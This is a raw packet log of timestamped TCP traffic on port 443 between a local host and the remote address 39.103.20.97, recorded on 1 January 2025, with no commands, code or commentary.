Jan 1, 2025 08:24:35.400985956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.400996923 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401000977 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401016951 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401024103 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401041031 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401043892 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401056051 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401067019 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401086092 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401089907 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401099920 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401125908 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401130915 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401148081 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401175976 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401279926 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401319027 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401319981 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401325941 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401361942 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401362896 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401369095 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401391983 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401405096 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401407957 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401428938 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401439905 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401622057 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401654959 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401664019 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401668072 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401684999 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401684999 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401707888 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401710987 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401727915 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401737928 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401755095 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401758909 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401776075 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401779890 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401807070 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401809931 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401827097 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401833057 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401854992 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401858091 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.401885033 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.401906967 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.402041912 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.402080059 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.402087927 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.402118921 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.611323118 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.611443996 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.819334030 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.819397926 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.902096987 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.902105093 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.902163982 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.902172089 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.902265072 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.902265072 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:35.902271032 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:35.902384996 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037592888 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037604094 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037615061 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037619114 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037774086 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037774086 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037781000 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037791967 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037801981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037863970 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037867069 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037883043 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037914991 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.037919044 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.037965059 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.038063049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.038068056 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038078070 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038081884 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038220882 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.038224936 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038234949 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038252115 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038357019 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.038357019 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.038361073 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038367033 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.038608074 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.247334957 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.247499943 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:36.675338030 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:36.675400972 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.125051022 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.125070095 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.125083923 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.125132084 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.125137091 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.125164986 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.125168085 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.125186920 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.125236988 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144030094 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144033909 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144046068 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144262075 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144267082 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144301891 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144310951 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144370079 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144373894 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144407988 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144412041 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144423962 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144449949 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144468069 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144481897 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144500971 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144505978 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144515991 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144540071 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144545078 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144556046 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144578934 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144592047 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.144623041 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.144644976 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.283086061 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.283093929 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.283109903 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.283217907 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.283288002 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306149960 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306153059 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306163073 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306174040 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306322098 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306325912 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306359053 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306369066 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306437969 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306453943 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306466103 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306492090 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306497097 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306549072 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306555986 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306564093 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.306592941 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.306634903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.482137918 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.482146025 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.482278109 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.507703066 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.507705927 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.507731915 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.507754087 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.507761002 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.507875919 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.507879972 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.507956028 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.507961035 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.508122921 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.508127928 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.508151054 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.508160114 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.508292913 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.508299112 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.508342981 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.715337038 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.716708899 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.741909981 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.741921902 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.741935015 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.742055893 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770307064 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770313025 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770338058 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770349026 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770412922 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770416975 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770515919 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770520926 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770534039 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770543098 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770658970 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770664930 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770683050 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770690918 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770800114 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.770804882 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.770862103 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:37.975336075 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:37.976700068 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.403327942 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.403390884 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.500137091 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.500144005 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.500153065 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.500194073 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.500197887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.500206947 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.500227928 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.500231981 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.500263929 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.500289917 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539288998 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539294004 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539321899 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539331913 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539388895 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539393902 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539403915 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539434910 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539438009 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539477110 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539479971 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539489031 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539510965 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539514065 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539551020 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539555073 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539561987 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.539587021 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.539643049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.747338057 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.748702049 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.794066906 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.794080973 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.794090986 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.794099092 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.794181108 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.832016945 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.832025051 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832039118 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832051039 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832161903 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.832168102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832195044 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832207918 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832319975 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.832324982 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832340956 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832349062 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832461119 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:38.832465887 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:38.832534075 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.043323040 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.043396950 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.129615068 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.129622936 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.129635096 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.129640102 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.129741907 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166440964 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166446924 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166464090 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166470051 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166598082 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166604042 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166619062 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166624069 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166738987 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166743994 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166785955 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166794062 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166867018 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166878939 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.166896105 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.166954994 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.375335932 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.376713037 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.443573952 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.443579912 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.443605900 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.443609953 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.443723917 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.482099056 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.482104063 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482136011 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482141018 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482542038 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.482547045 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482558966 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482567072 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482721090 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.482726097 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482738972 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482742071 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482884884 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.482888937 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.482976913 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.691338062 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.692704916 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.794728994 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.794734955 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.794748068 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.794856071 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.843508005 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:39.843513012 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:39.843637943 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:40.198508024 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:40.251632929 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:41.213332891 CET	49950	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:41.213351011 CET	443	49950	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:41.504066944 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:41.504106998 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:41.504193068 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:41.504422903 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:41.504448891 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:42.729044914 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:42.732748985 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:42.737337112 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:42.737373114 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:42.737519979 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:42.737533092 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.069649935 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.069669008 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.069772959 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.069799900 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.069860935 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.069941998 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.069998980 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.070370913 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.070430994 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.299288988 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.299346924 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.299372911 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.299396038 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.299428940 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.299473047 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300005913 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.300034046 CET	443	50006	39.103.20.97	192.168.2.4
Jan 1, 2025 08:24:43.300071955 CET	50006	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:24:43.300106049 CET	443	50006	39.103.20.97	192.168.2.4
